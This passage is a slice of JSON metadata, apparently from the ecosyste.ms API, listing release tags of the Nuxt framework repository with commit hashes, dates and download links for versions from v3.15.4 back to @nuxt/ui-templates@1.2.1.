nuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/n